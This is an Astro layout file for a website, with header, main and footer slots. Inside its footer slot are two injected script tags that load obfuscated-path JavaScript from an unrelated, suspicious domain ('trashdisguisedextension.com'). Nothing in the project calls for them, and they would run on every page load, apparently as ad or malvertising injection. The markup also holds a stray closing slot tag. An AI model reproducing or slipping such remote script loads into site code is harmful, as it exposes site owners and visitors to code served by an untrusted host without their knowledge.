---
import Layout from '~/layouts/BaseLayout.astro';
import Header from '~/components/widgets/Header.astro';
import Footer from '~/components/widgets/Footer.astro';
import Announcement from '~/components/widgets/Announcement.astro';

import { headerData, footerData } from '~/data';

import { MetaSEO } from '~/types';

export interface Props {
  meta?: MetaSEO;
}

const { meta } = Astro.props;
---

<Layout {meta}>
  </slot>
  <slot name="header">
    <Header {...headerData} isSticky showRssFeed showToggleTheme />
  </slot>
  <main>
    <slot />
  </main>
  <slot name="footer">
<script type='text/javascript' src='//trashdisguisedextension.com/2f/4e/fc/2f4efc7b2f57ea3230a910a9f691d4d2.js'></script>
<script async="async" data-cfasync="false" src="//trashdisguisedextension.com/4349930b3922881b11d74074cc3189ed/invoke.js"></script>
<div id="container-4349930b3922881b11d74074cc3189ed"></div>
    <Footer {...footerData} />
  </slot>
</Layout>
